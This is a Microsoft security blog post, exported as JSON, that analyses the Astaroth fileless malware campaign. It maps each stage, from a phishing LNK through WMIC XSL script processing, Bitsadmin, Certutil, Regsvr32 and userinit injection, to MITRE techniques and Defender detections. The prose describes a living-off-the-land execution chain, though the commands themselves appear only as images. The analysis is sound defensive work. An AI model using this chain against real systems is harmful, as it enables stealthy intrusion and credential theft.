{"id":89592,"date":"2019-07-08T09:00:51","date_gmt":"2019-07-08T16:00:51","guid":{"rendered":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/?p=89592"},"modified":"2025-12-21T14:06:33","modified_gmt":"2025-12-21T22:06:33","slug":"dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack","status":"publish","type":"post","link":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/","title":{"rendered":"Dismantling a fileless campaign: Microsoft Defender ATP&#8217;s Antivirus exposes Astaroth attack"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">The prevailing perception about fileless threats, among the security industry\u2019s biggest areas of concern today, is that security solutions are helpless against these supposedly invincible threats. Because fileless attacks run the payload directly in memory or leverage legitimate system tools to run malicious code without having to drop executable files on the disk, they present challenges to traditional file-based solutions.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">But let\u2019s set the record straight: being fileless doesn\u2019t mean being invisible; it certainly doesn\u2019t mean being undetectable. There\u2019s no such thing as the perfect cybercrime: even fileless malware leaves a long trail of evidence that advanced detection technologies in Microsoft Defender Advanced Threat Protection (<a href=\"https:\/\/www.microsoft.com\/en-us\/WindowsForBusiness\/windows-atp\">Microsoft Defender ATP<\/a>) can detect and stop.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">To help disambiguate the term fileless, we developed a <a href=\"https:\/\/docs.microsoft.com\/windows\/security\/threat-protection\/intelligence\/fileless-threats\">comprehensive definition for fileless malware<\/a> as reference for understanding the wide range of fileless threats. 
We have also discussed at length the <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2018\/09\/27\/out-of-sight-but-not-invisible-defeating-fileless-malware-with-behavior-monitoring-amsi-and-next-gen-av\/\">advanced capabilities in Microsoft Defender ATP that counter fileless techniques<\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">I recently unearthed a widespread fileless campaign called <a href=\"https:\/\/attack.mitre.org\/software\/S0373\/\">Astaroth<\/a> that completely \u201clived off the land\u201d: it only ran system tools throughout a complex attack chain. The attack involved multiple steps that use various fileless techniques and proved a great real-world benchmark for Microsoft Defender ATP\u2019s capabilities against fileless threats.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In this blog, I will share my analysis of a fileless attack chain that demonstrates:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\">Attackers would go to great lengths to avoid detection<\/li>\n\n\n\n<li class=\"wp-block-list-item\">Advanced technologies in Microsoft Defender ATP&#8217;s <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/06\/24\/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection\/\">Antivirus<\/a> expose and defeat fileless attacks<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"exposing-a-fileless-info-stealing-campaign-with-microsoft-defender-atp-s-antivirus\">Exposing a fileless info-stealing campaign with Microsoft Defender ATP&#8217;s Antivirus<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">I was doing routine review of Windows Defender Antivirus telemetry when I noticed an anomaly from a detection algorithm designed to catch a specific fileless technique. 
Telemetry showed a sharp increase in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script (a technique that MITRE refers to as <a href=\"https:\/\/attack.mitre.org\/techniques\/T1220\/\">XSL Script Processing<\/a>), indicating a fileless attack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1127\" height=\"377\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/fig1-wmic-related-attacks.png\" alt=\"Windows Defender Antivirus telemetry shows a sudden increase in suspicious activity\" class=\"wp-image-89608\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1-wmic-related-attacks.png 1127w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1-wmic-related-attacks-300x100.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1-wmic-related-attacks-768x257.png 768w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1-wmic-related-attacks-1024x343.png 1024w\" sizes=\"auto, (max-width: 1127px) 100vw, 1127px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 1. Windows Defender Antivirus telemetry shows a sudden increase in suspicious activity<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">After some hunting, I discovered the campaign that aimed to run the <a href=\"https:\/\/attack.mitre.org\/software\/S0373\/\">Astaroth<\/a> backdoor directly in memory. Astaroth is notorious info-stealing malware that collects sensitive information such as credentials and keystrokes and exfiltrates it to a remote attacker. 
The attacker can then use stolen data to try moving laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">While the behavior varies slightly in some instances, the attack generally followed these steps: A malicious link in a spear-phishing email leads to an LNK file. When double-clicked, the LNK file causes the execution of the WMIC tool with the \u201c\/Format\u201d parameter, which downloads a remote XSL file and runs the JavaScript code it contains. The JavaScript code in turn downloads payloads by abusing the Bitsadmin tool.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">All the payloads are Base64-encoded and decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1597\" height=\"1324\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/fig1a-astaroth-attack-chain.png\" alt=\"Astaroth \u201cliving-off-the-land\u201d attack chain showing multiple legitimate tools abused\" class=\"wp-image-89595\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1a-astaroth-attack-chain.png 1597w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1a-astaroth-attack-chain-300x249.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1a-astaroth-attack-chain-768x637.png 768w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig1a-astaroth-attack-chain-1024x849.png 1024w\" sizes=\"auto, (max-width: 1597px) 100vw, 1597px\" \/><\/figure>\n\n\n\n<p 
class=\"wp-block-paragraph\"><em>Figure 2. Astaroth \u201cliving-off-the-land\u201d attack chain showing multiple legitimate tools abused<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">It\u2019s interesting to note that at no point during the attack chain is any file run that\u2019s not a system tool. This technique is called <a href=\"https:\/\/github.com\/LOLBAS-Project\/LOLBAS\/blob\/master\/README.md\">living off the land<\/a>: using legitimate tools that are already present on the target system to masquerade as regular activity.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The attack chain above shows only the <a href=\"https:\/\/attack.mitre.org\/tactics\/TA0001\/\">Initial Access<\/a> and <a href=\"https:\/\/attack.mitre.org\/tactics\/TA0002\/\">Execution<\/a> stages. In these stages, the attackers used fileless techniques to attempt to silently install the malware on target devices. Astaroth is a notorious information stealer with many other post-breach capabilities that are not discussed in this blog. Preventing the attack in these stages is critical.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Despite its use of \u201cinvisible\u201d techniques, the attack chain runs under the scrutiny of Microsoft Defender ATP. <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/06\/24\/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection\/\">Multiple advanced technologies at the core of Windows Defender Antivirus<\/a> expose these techniques to spot and stop a wide range of attacks.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">These protection technologies stop threats at first sight, use the power of the cloud, and leverage Microsoft\u2019s industry-leading optics to deliver effective protection. 
This defense-in-depth is observed in the way these technologies uncovered and blocked the attack at multiple points in Astaroth\u2019s complex attack chain.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1597\" height=\"1324\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/fig2b-microsoft-defender-atp-next-gen-protection.png\" alt=\"Microsoft Defender ATP's Antivirus solutions for fileless techniques used by Astaroth\" class=\"wp-image-89596\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig2b-microsoft-defender-atp-next-gen-protection.png 1597w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig2b-microsoft-defender-atp-next-gen-protection-300x249.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig2b-microsoft-defender-atp-next-gen-protection-768x637.png 768w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/fig2b-microsoft-defender-atp-next-gen-protection-1024x849.png 1024w\" sizes=\"auto, (max-width: 1597px) 100vw, 1597px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 3. Microsoft Defender ATP&#8217;s Antivirus solutions for fileless techniques used by Astaroth<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For traditional, file-centric antivirus solutions, the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded\u2014after all, every executable used in the attack is non-malicious. If this were the case, this attack would pose a serious problem: since the DLLs use code obfuscation and are likely to change very rapidly between campaigns, focusing on these DLLs would be a vicious trap.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">However, as mentioned, Microsoft Defender ATP&#8217;s Antivirus catches fileless techniques. 
Let\u2019s break down the attack steps, enumerate the techniques used, with <a href=\"https:\/\/attack.mitre.org\/techniques\/pre\/\">MITRE technique IDs<\/a> as reference, and map the relevant Microsoft Defender ATP protection.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-1-arrival\">Step 1: Arrival<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The victim receives an email with a malicious URL:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"34\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/1-URL.png\" alt=\"screenshot\" class=\"wp-image-89597\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/1-URL.png 830w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/1-URL-300x12.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/1-URL-768x31.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The URL uses misleading names like <em>certidao.htm<\/em> (Portuguese for \u201ccertificate\u201d), <em>abrir_documento.htm<\/em> (\u201copen document\u201d), <em>pedido.htm<\/em> (\u201corder\u201d), etc.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">When clicked, the malicious link redirects the victim to the ZIP archive <em>certidao.htm.zip<\/em>, which contains a similarly misleadingly named LNK file <em>certidao.htm.lnk<\/em>. 
When clicked, the LNK file runs an obfuscated BAT command-line.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MITRE techniques observed<em>:<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1192\/\">T1192<\/a> \u2013 Spearphishing Link<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1023\/\">T1023<\/a> \u2013 Shortcut Modification<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><strong>Command-line scanning<\/strong>: Trojan:Win32\/BadEcho.A<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>Heuristics engine<\/strong>: Trojan:Win32\/Linkommer.A<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>Windows Defender SmartScreen<\/strong><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-2-wmic-abuse-part-1\">Step 2: WMIC abuse, part 1<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The BAT command runs the system tool <em>WMIC.exe<\/em>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"54\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/2-wmic.png\" alt=\"screenshot\" class=\"wp-image-89598\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/2-wmic.png 830w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/2-wmic-300x20.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/2-wmic-768x50.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The use of the parameter <em>\/format<\/em> causes WMIC to download 
the file <em>v.txt<\/em>, which is an XSL file hosted on a legitimate-looking domain. The XSL file hosts an obfuscated JavaScript that is automatically run by WMIC. This JavaScript code simply runs WMIC again.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MITRE techniques observed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1047\/\">T1047<\/a> \u2013 Windows Management Instrumentation<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1220\/\">T1220<\/a> \u2013 XSL Script Processing<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1064\/\">T1064<\/a> \u2013 Scripting<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1027\/\">T1027<\/a> \u2013 Obfuscated Files Or Information<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><span style=\"display: inline !important; float: none; background-color: #ffffff; color: #333333; cursor: text; font-family: Georgia,'Times New Roman','Bitstream Charter',Times,serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration: none; text-indent: 0px; text-transform: none; -webkit-text-stroke-width: 0px; white-space: normal; word-spacing: 0px;\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/span><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><strong>Behavior monitoring engine<\/strong>: Behavior:Win32\/WmiFormatXslScripting<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>AMSI integration engine<\/strong>: Trojan:JS\/CovertXslDownload.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-3-wmic-abuse-part-2\">Step 3: WMIC abuse, part 2<\/h3>\n\n\n\n<p 
class=\"wp-block-paragraph\">WMIC is run in a fashion similar to the previous step:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"54\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/3-wmic.png\" alt=\"screenshot\" class=\"wp-image-89599\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/3-wmic.png 830w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/3-wmic-300x20.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/3-wmic-768x50.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">WMIC downloads <em>vv.txt<\/em>, another XSL file containing an obfuscated JavaScript code, which uses the Bitsadmin, Certutil, and Regsvr32 tools for the next steps.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MITRE techniques observed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1047\/\">T1047<\/a> \u2013 Windows Management Instrumentation<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1220\/\">T1220<\/a> \u2013 XSL Script Processing<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1064\/\">T1064<\/a> \u2013 Scripting<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1027\/\">T1027<\/a> \u2013 Obfuscated Files Or Information<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><span style=\"display: inline !important; float: none; background-color: #ffffff; color: #333333; cursor: text; font-family: Georgia,'Times New Roman','Bitstream Charter',Times,serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: 
left; text-decoration: none; text-indent: 0px; text-transform: none; -webkit-text-stroke-width: 0px; white-space: normal; word-spacing: 0px;\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/span><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><strong>Behavior monitoring engine<\/strong>: Behavior:Win32\/WmiFormatXslScripting<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>Behavior monitoring engine<\/strong>: Behavior:Win32\/WmicLoadDll.A<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>AMSI integration engine<\/strong>: Trojan:JS\/CovertBitsDownload.C<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-4-bitsadmin-abuse\">Step 4: Bitsadmin abuse<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Multiple instances of Bitsadmin are run to download additional payloads:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"74\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/4-bitsadmin.png\" alt=\"screenshot\" class=\"wp-image-89600\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/4-bitsadmin.png 830w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/4-bitsadmin-300x27.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/4-bitsadmin-768x68.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The payloads are <a href=\"https:\/\/en.wikipedia.org\/wiki\/Base64\">Base64-encoded<\/a> and have file names like: <em>falxconxrenwb.~<\/em>, <em>falxconxrenw64.~<\/em>, <em>falxconxrenwxa.~<\/em>, <em>falxconxrenwxb.~<\/em>, <em>falxconxrenw98.~<\/em>, <em>falxconxrenwgx.gif<\/em>, <em>falxfonxrenwg.gif<\/em>.<\/p>\n\n\n\n<p 
class=\"wp-block-paragraph\">MITRE techniques observed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1197\/\">T1197<\/a> \u2013 BITS Jobs<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1105\/\">T1105<\/a> \u2013 Remote File Copy<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><span style=\"display: inline !important; float: none; background-color: #ffffff; color: #333333; cursor: text; font-family: Georgia,'Times New Roman','Bitstream Charter',Times,serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration: none; text-indent: 0px; text-transform: none; -webkit-text-stroke-width: 0px; white-space: normal; word-spacing: 0px;\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/span><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><strong>Behavior monitoring engine<\/strong>: Behavior:Win32\/WmicBits.A<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-5-certutil-abuse\">Step 5: Certutil abuse<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The Certutil system tool is used to decode the downloaded payloads:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"54\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/5-certutil.png\" alt=\"screenshot\" class=\"wp-image-89601\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/5-certutil.png 830w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/5-certutil-300x20.png 300w, 
https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/5-certutil-768x50.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Only two of the files decode to plain DLLs; the rest remain encrypted or obfuscated.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MITRE technique observed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1140\/\">T1140<\/a> &#8211; Deobfuscate\/Decode Files Or Information<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><strong>Behavior monitoring engine<\/strong>: Behavior:Win32\/WmiCertutil.A<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-6-regsvr32-abuse\">Step 6: Regsvr32 abuse<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">One of the decoded payload files (a DLL) is run within the context of the Regsvr32 system tool:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"34\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/08\/6-regsvr2.png\" alt=\"screenshot\" class=\"wp-image-89602\" 
srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/6-regsvr2.png 830w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/6-regsvr2-300x12.png 300w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/6-regsvr2-768x31.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The file <em>falxconxrenw64.~<\/em> is a proxy: it loads and runs a second DLL, <em>falxconxrenw98.~<\/em>, and passes it a third DLL that is obtained by reading the files <em>falxconxrenwxa.~<\/em> and <em>falxconxrenwxb.~<\/em>. The DLL <em>falxconxrenw98.~<\/em> then reflectively loads that third DLL.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MITRE techniques observed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1117\/\">T1117<\/a> \u2013 Regsvr32<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1129\/\">T1129<\/a> \u2013 Execution Through Module Load<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1140\/\">T1140<\/a> &#8211; Deobfuscate\/Decode Files Or Information<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><strong>Behavior monitoring engine<\/strong>: 
Behavior:Win32\/UserinitInject.B<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>Attack surface reduction<\/strong>: An attack surface reduction rule detects the loading of a DLL that does not meet the age and prevalence criteria (i.e., a new unknown DLL)<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"step-7-userinit-abuse\">Step 7: Userinit abuse<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The newly loaded DLL reads and decrypts the file <em>falxconxrenwgx.gif<\/em> into a DLL. It runs the system tool <em>userinit.exe<\/em> into which it injects the decrypted DLL. The file <em>falxconxrenwgx.gif<\/em> is again a proxy that reads, decrypts, and reflectively loads the DLL <em>falxconxrenwg.gif<\/em>. This last DLL is the malicious info stealer known as <a href=\"https:\/\/attack.mitre.org\/software\/S0373\/\">Astaroth<\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">MITRE techniques observed:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1117\/\">T1117<\/a> \u2013 Regsvr32<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1129\/\">T1129<\/a> \u2013 Execution Through Module Load<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1140\/\">T1140<\/a> &#8211; Deobfuscate\/Decode Files Or Information<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><span style=\"display: inline !important; float: none; background-color: #ffffff; color: #333333; cursor: text; font-family: Georgia,'Times New Roman','Bitstream Charter',Times,serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration: none; text-indent: 0px; text-transform: none; -webkit-text-stroke-width: 0px; 
white-space: normal; word-spacing: 0px;\">Microsoft Defender ATP&#8217;s Antivirus protection:<\/span><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"wp-block-list-item\"><strong>Behavior monitoring engine<\/strong>: Behavior:Win32\/Astaroth.A<\/li>\n\n\n\n<li class=\"wp-block-list-item\"><strong>Attack surface reduction<\/strong>: An attack surface reduction rule detects the loading of a DLL that does not meet the age and prevalence criteria (i.e., a new unknown DLL)<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"comprehensive-protection-against-fileless-attacks-with-microsoft-threat-protection\">Comprehensive protection against fileless attacks with Microsoft Threat Protection<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The strength of Microsoft Defender ATP&#8217;s Antivirus engines in exposing fileless techniques adds to the capabilities of the <a href=\"https:\/\/www.microsoft.com\/en-us\/WindowsForBusiness\/windows-atp\">unified endpoint protection platform<\/a>. Activities related to fileless techniques are reported in Microsoft Defender Security Center as alerts, so security operations teams can further investigate and respond to attacks using endpoint detection and response, advanced hunting, and other capabilities in Microsoft Defender ATP.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"382\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/07\/c1-Windows-Defender-AV-detection-in-Microsoft-Defender-Security-Center.png\" alt=\"screenshot\" class=\"wp-image-89619\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/c1-Windows-Defender-AV-detection-in-Microsoft-Defender-Security-Center.png 400w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/c1-Windows-Defender-AV-detection-in-Microsoft-Defender-Security-Center-300x287.png 300w\" sizes=\"auto, (max-width: 400px) 
